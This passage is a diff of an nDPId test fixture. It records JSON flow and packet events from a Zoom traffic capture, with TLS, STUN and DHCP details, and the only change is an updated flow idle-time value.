Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520468959,"flow_last_seen":1569520469200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520469200,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01219{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520468959,"flow_last_seen":1569520469201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520469201,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"log.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, 
O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1569520469210,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469210,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIjkkAAEARYjHAqAF1ov8lDl1fDZYANPtTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569520469189,"flow_last_seen":1569520469210,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469210,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469221,"flow_last_seen":1569520469221,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -63,14 +63,14 @@ 00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469253,"flow_last_seen":1569520469253,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469253,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569520469264,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469264,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIADMAAEAR70fAqAF1ov8mDl1fDZcANPpSAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569520469274,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469274,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIzF0AAEARIx3AqAF1ov8mDl1fDZcANPpSAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469340,"flow_last_seen":1569520469340,"flow_idle_time":7440000,"flow_min_l4_payload_len":263,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":263,"midstream":1,"thread_ts_msec":1569520469340,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00825{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569520469340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":329,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":329,"pkt_l4_len":295,"thread_ts_msec":1569520469340,"pkt":"EBMx8Tl2KDc3AG3ICABFAAE7AABAAEAGza7AqAF1aMdBKtJrAFCnuOoZVolcQYAYEADYHwAAAQEICiWc2yOz1c0BjkVSpFLY1xT06OSrjoriJgcfK\/\/jFeJ0MBFnTs\/gjSBBTilLonupmCKu9pPH3O3kr0WdmS15RGnoT780kKdV0pI3Sc4BmoL3SDuD+4AKh61lYz9\/Fy+NoN7yg5wYBt1EyrpPMLbLqHBNHL\/bSEl7ELs0VVSBp\/yK5KmmCJ9NxlFB5OhyVsIKKMN16tHZjCMzvfXD8zzASLDMp2Jgo7P\/WwPcHOM+42RSXjbuLZ5ok2AmF+hLRIKzRuPPREeQ7vQwmpDzjOHW9Sf++k9YwzgVZySXAtDkgpGRg+YDLvXpKGuHNj5xgws4SOHXAFvt3QGUXS4yo6IYy8o0BGkEyJuTk1MEHV6JN74="} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469341,"flow_last_seen":1569520469341,"flow_idle_time":7440000,"flow_min_l4_payload_len":1368,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1368,"flow_avg_l4_payload_len":1368,"midstream":1,"thread_ts_msec":1569520469341,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02323{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569520469341,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1434,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1434,"pkt_l4_len":1400,"thread_ts_msec":1569520469341,"pkt":"EBMx8Tl2KDc3AG3ICABFAAWMAABAAEAGb1\/AqAF1I7rgNdJwAbu\/4X6L2uaJRIAQEAC3VgAAAQEICiWc2ySFp5bjFwMDBZ4AAAAAAAAAkgusoLvJ6vSttM3Q7UxWnNoYus44vvH4fsNNbl6rpvk6OYpGeuvwflaMmUGTYIrirttSlsO38H0GA7wE0xtelFBUIqtPaG2zLaELN02TEy8tUFQrsrqVaYUsCYJ2hIqsiRr8HUVz8JaKDjyEbW\/6SDuFmHrK8XtHElqv0awJOAEmL3KNt0jVBWwHCGEFsZPcfO1pHuuoiBuup3wZUBRnIJST+dFPme0TV6vJ+IxOjx\/mA8fFWqQdV0lKttFkpnySiRxX5yrxpipVJy4p7z67+kAmdWhmjAbJ0jKiyDw+DcyTkynUokZHprab8MCYp\/TQx3xlQiW8+bdGrifHDAXawAfxdyEnxRfDIbdQKLwqUd3q\/7pZfr\/4d1tUDgm0WlajX7mPfF9WlQlsZCy+ChrMLq6KB65LC24miZN0Oh\/kWW3n1lqgTdT6wyEHUQbhN7aMRFDURjgWnZBDWn4PrH7p5zNvQSTu1\/tX7DHH9FI+E\/S8F73db4ge7KXn\/dETNp0MT++lGzZNvQ8tP2HIXFPFo1PFoNApoahzcRPgbV1rmTnmuWdwR6k9v2rQ51IRkvomJ5+TW8zK\/T3dpZj8bQ2ZXFOOqjyv1+mdfNtQelTeuF+xFuT9k3w43crUkirHNjO6HDcTH8g5iwOfX\/P5Ze+j2MahTCw4IqO2cgO0GUqqgaRqFgkBd4qtJfEyTzJvn2QyDNF8nXiqgRtiC89ltDf6sKzt1TUcglqiIso29y4WBLLmAnOlHxC5COmZYEu0CraDE3vjq3Eo6QVYa5U+p4OKJ9K9r563eLKRSjLRb\/GJwoU19nJfa5zVERWEq0IToF\/rMA7vLUy3muT3dZmJxkOsSuFN\/Usyd+T412g2p1ZdXXnKqATMbFhbdBtC\/y58N+Ld\/82QR
9uhyJTGIl+G7bL56l07dPTLTdZ8Usdj23buwPw30vMgmi+E2m8MN9Y502dlBs94rGej8il7sUNS4pRHgYLTyWg6cZyS8AsHVWXff0sHuCuhPPV8M5EKNXzyntJ0gexz8gHMiqPY4NI0Ni\/OneEqQ4C8E6uqXvI2kcZ2BOG\/p4MX8o3AIWp7ayyFuWOJxi2lw6TEu8NuHHmGI4kv4FI3\/kgSQc6sf3SB44BSo3k4njWMAfAGbStQzO7TdByZBgUmqKdUtWCav3gJeVcsVZvgE+oEb2RNn0kn49ZouFmtBZa4MHnF81Rig78AE6ulpakr3aQ66b3O\/vtpHtpLOQcnjEQ\/qS+\/M1GayjxpQWCXEP02WwpvuLolzsWcvLf0N4iVpkzaVwjd0PnTczMC0nRmMJNbIBUnjIjJ5eKWfHSbRJbj\/MtVxqJwc8zwost2cccITh0lHc81zUSBD7GSF5b9zV7g2B0N4HfRanVjZhq4\/wraioSAC+795Umn4JCnMPSUAwuEnGuY7\/qhVrVORRO8KqXtC5\/5m+ff6XLy24O2WsPRzzPmP37Tt6opYkQlNaCU6f6MSh5leucVqZunkohryKjXGP2HU49rKyG4sSngfKn7U3ByAtKcO8nimiTP81z1QcgS2WUUKeZI5VJBPQ5toQ20MunmnQc+AjUHR7cCT28cN30m+ZL49Jt0RzL1N4yKvfdecf7UAMl9WG3IWewXXS8itIsi3DkAYv6t2MOlXE9XEWXdwxfePqJvzpR\/iHVQx\/6oobZRIQjxTbqoCvtXEg2uj6gJpcxIkn9+KrUGRl5tdROeMX0NbfZvt+g+tOcHvsvl+k5qrsiSB57D9TdRPsfMHD4AQRHjKQWksr1jHIvNkgNXnSPAu9+rrqEJ8piMP7LlZAKGZwhC"} -00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1569520469341,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1569520469341,"pkt":"EBMx8Tl2KDc3AG3ICABFAAB\/AABAAEAGdGzAqAF1I7rgNdJwAbu\/4YPj2uaJRIAYEACuSgAAAQEICiWc2ySFp5bjD8rJVgENkhz7SGo+3tsT+62YMYedQzLcJKiig4pAH+hO24ZoiQ1LNK0ZidRBnPFEPrr+zH4y+BGqQ1wCDA9XJFEjegtqGmZzuBXv"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1569520469354,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469354,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA07H8AAHcGkTcjuuA1wKgBdQG70nDa5olEv+GD44AQA\/fBegAAAQEICoWn6LklnNsk"} 
-00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569520469370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1569520469370,"pkt":"KDc3AG3IEBMx8Tl2CABFAABrxSVAADUGFFlox0EqwKgBdQBQ0mtWiVxBp7jrIIAYACoMGQAAAQEICrPWHtMlnNsjzR67t55lmahUyt3+F7wIZY40kmp5z0B6VTx\/VJbCVWp7syOQaUpp1Ik5I7MknMnzBR1VLfTDBg=="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569520469370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469370,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGzrXAqAF1aMdBKtJrAFCnuOsgVolceIAQD\/4OlAAAAQEICiWc2z+z1h7T"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469340,"flow_last_seen":1569520469340,"flow_idle_time":7560000,"flow_min_l4_payload_len":263,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":263,"midstream":1,"thread_ts_msec":1569520469340,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00825{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569520469340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":329,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":329,"pkt_l4_len":295,"thread_ts_msec":1569520469340,"pkt":"EBMx8Tl2KDc3AG3ICABFAAE7AABAAEAGza7AqAF1aMdBKtJrAFCnuOoZVolcQYAYEADYHwAAAQEICiWc2yOz1c0BjkVSpFLY1xT06OSrjoriJgcfK\/\/jFeJ0MBFnTs\/gjSBBTilLonupmCKu9pPH3O3kr0WdmS15RGnoT780kKdV0pI3Sc4BmoL3SDuD+4AKh61lYz9\/Fy+NoN7yg5wYBt1EyrpPMLbLqHBNHL\/bSEl7ELs0VVSBp\/yK5KmmCJ9NxlFB5OhyVsIKKMN16tHZjCMzvfXD8zzASLDMp2Jgo7P\/WwPcHOM+42RSXjbuLZ5ok2AmF+hLRIKzRuPPREeQ7vQwmpDzjOHW9Sf++k9YwzgVZySXAtDkgpGRg+YDLvXpKGuHNj5xgws4SOHXAFvt3QGUXS4yo6IYy8o0BGkEyJuTk1MEHV6JN74="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469341,"flow_last_seen":1569520469341,"flow_idle_time":7560000,"flow_min_l4_payload_len":1368,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1368,"flow_avg_l4_payload_len":1368,"midstream":1,"thread_ts_msec":1569520469341,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+02323{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569520469341,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1434,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1434,"pkt_l4_len":1400,"thread_ts_msec":1569520469341,"pkt":"EBMx8Tl2KDc3AG3ICABFAAWMAABAAEAGb1\/AqAF1I7rgNdJwAbu\/4X6L2uaJRIAQEAC3VgAAAQEICiWc2ySFp5bjFwMDBZ4AAAAAAAAAkgusoLvJ6vSttM3Q7UxWnNoYus44vvH4fsNNbl6rpvk6OYpGeuvwflaMmUGTYIrirttSlsO38H0GA7wE0xtelFBUIqtPaG2zLaELN02TEy8tUFQrsrqVaYUsCYJ2hIqsiRr8HUVz8JaKDjyEbW\/6SDuFmHrK8XtHElqv0awJOAEmL3KNt0jVBWwHCGEFsZPcfO1pHuuoiBuup3wZUBRnIJST+dFPme0TV6vJ+IxOjx\/mA8fFWqQdV0lKttFkpnySiRxX5yrxpipVJy4p7z67+kAmdWhmjAbJ0jKiyDw+DcyTkynUokZHprab8MCYp\/TQx3xlQiW8+bdGrifHDAXawAfxdyEnxRfDIbdQKLwqUd3q\/7pZfr\/4d1tUDgm0WlajX7mPfF9WlQlsZCy+ChrMLq6KB65LC24miZN0Oh\/kWW3n1lqgTdT6wyEHUQbhN7aMRFDURjgWnZBDWn4PrH7p5zNvQSTu1\/tX7DHH9FI+E\/S8F73db4ge7KXn\/dETNp0MT++lGzZNvQ8tP2HIXFPFo1PFoNApoahzcRPgbV1rmTnmuWdwR6k9v2rQ51IRkvomJ5+TW8zK\/T3dpZj8bQ2ZXFOOqjyv1+mdfNtQelTeuF+xFuT9k3w43crUkirHNjO6HDcTH8g5iwOfX\/P5Ze+j2MahTCw4IqO2cgO0GUqqgaRqFgkBd4qtJfEyTzJvn2QyDNF8nXiqgRtiC89ltDf6sKzt1TUcglqiIso29y4WBLLmAnOlHxC5COmZYEu0CraDE3vjq3Eo6QVYa5U+p4OKJ9K9r563eLKRSjLRb\/GJwoU19nJfa5zVERWEq0IToF\/rMA7vLUy3muT3dZmJxkOsSuFN\/Usyd+T412g2p1ZdXXnKqATMbFhbdBtC\/y58N+Ld\/82QR9uhyJTGIl+G7bL56l07dPTLTdZ8Usdj23buwPw30vMgmi+E2m8MN9Y502dlBs94rGej8il7sUNS4pRHgYLTyWg6cZyS8AsHVWXff0sHuCuhPPV8M5EKNXzyntJ0gexz8gHMiqPY4NI0Ni\/OneEqQ4C8E6uqXvI2kcZ2BOG\/p4MX8o3AIWp7ayyFuWOJxi2lw6TEu8NuHHmGI4kv4FI3\/kgSQc6sf3SB44BSo3k4njWMAfAGbStQzO7TdByZBgUmqKdUtWCav3gJeVcsVZvgE+oEb2RNn0kn49ZouFmtBZa4MHnF81Rig78AE6ulpakr3aQ66b3O\/vtpHtpLOQcnjEQ\/qS+\/M1GayjxpQWCXEP02WwpvuLolzsWcvLf0N4iVpkzaVwjd0PnTczMC0nRmMJNbIBUnjIjJ5eKWfHSbRJbj\/MtVxqJwc8zwost2cccITh0lHc81zUSBD7GSF5b9zV7g2B0N4HfRanVjZhq4\/wraioSAC+795Umn4JCnMPSUAwuEnGuY7\/qhVrVORRO8KqXtC5\/5m+ff6XLy24O2WsPRzzPmP37Tt6opYkQlNaCU6f6MSh5l
eucVqZunkohryKjXGP2HU49rKyG4sSngfKn7U3ByAtKcO8nimiTP81z1QcgS2WUUKeZI5VJBPQ5toQ20MunmnQc+AjUHR7cCT28cN30m+ZL49Jt0RzL1N4yKvfdecf7UAMl9WG3IWewXXS8itIsi3DkAYv6t2MOlXE9XEWXdwxfePqJvzpR\/iHVQx\/6oobZRIQjxTbqoCvtXEg2uj6gJpcxIkn9+KrUGRl5tdROeMX0NbfZvt+g+tOcHvsvl+k5qrsiSB57D9TdRPsfMHD4AQRHjKQWksr1jHIvNkgNXnSPAu9+rrqEJ8piMP7LlZAKGZwhC"} +00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1569520469341,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1569520469341,"pkt":"EBMx8Tl2KDc3AG3ICABFAAB\/AABAAEAGdGzAqAF1I7rgNdJwAbu\/4YPj2uaJRIAYEACuSgAAAQEICiWc2ySFp5bjD8rJVgENkhz7SGo+3tsT+62YMYedQzLcJKiig4pAH+hO24ZoiQ1LNK0ZidRBnPFEPrr+zH4y+BGqQ1wCDA9XJFEjegtqGmZzuBXv"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1569520469354,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469354,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA07H8AAHcGkTcjuuA1wKgBdQG70nDa5olEv+GD44AQA\/fBegAAAQEICoWn6LklnNsk"} +00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569520469370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1569520469370,"pkt":"KDc3AG3IEBMx8Tl2CABFAABrxSVAADUGFFlox0EqwKgBdQBQ0mtWiVxBp7jrIIAYACoMGQAAAQEICrPWHtMlnNsjzR67t55lmahUyt3+F7wIZY40kmp5z0B6VTx\/VJbCVWp7syOQaUpp1Ik5I7MknMnzBR1VLfTDBg=="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569520469370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469370,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGzrXAqAF1aMdBKtJrAFCnuOsgVolceIAQD\/4OlAAAAQEICiWc2z+z1h7T"} 00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469423,"flow_last_seen":1569520469423,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469423,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569520469423,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569520469423,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4WycAAEABlHPAqAF1ov8mDgMDkd4AAAAARQAAPMGVQAAuEf\/wov8mDsCoAXUNl11fACgAAA=="} 
00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469423,"flow_last_seen":1569520469423,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469423,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.182005} 
@@ -80,26 +80,26 @@ 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569520469797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1569520469797,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzBkxAAEARcsXAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGABIog9sAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} 00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": 
